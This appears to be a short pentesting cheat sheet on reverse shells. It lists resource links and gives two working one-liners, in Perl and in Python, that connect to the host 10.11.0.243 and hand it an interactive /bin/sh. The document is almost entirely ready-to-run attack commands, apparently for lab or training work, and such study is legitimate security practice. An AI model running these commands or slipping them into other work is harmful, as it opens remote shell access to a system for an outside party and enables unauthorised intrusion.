

################ REVERSE SHELLS

Resources:
      https://highon.coffee/blog/reverse-shell-cheat-sheet/
      http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
      http://pentestmonkey.net/blog/post-exploitation-without-a-tty



###==== PERL

##== linux
perl -e 'use Socket;$i="10.11.0.243";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'




###==== Python

##== linux
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.243",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
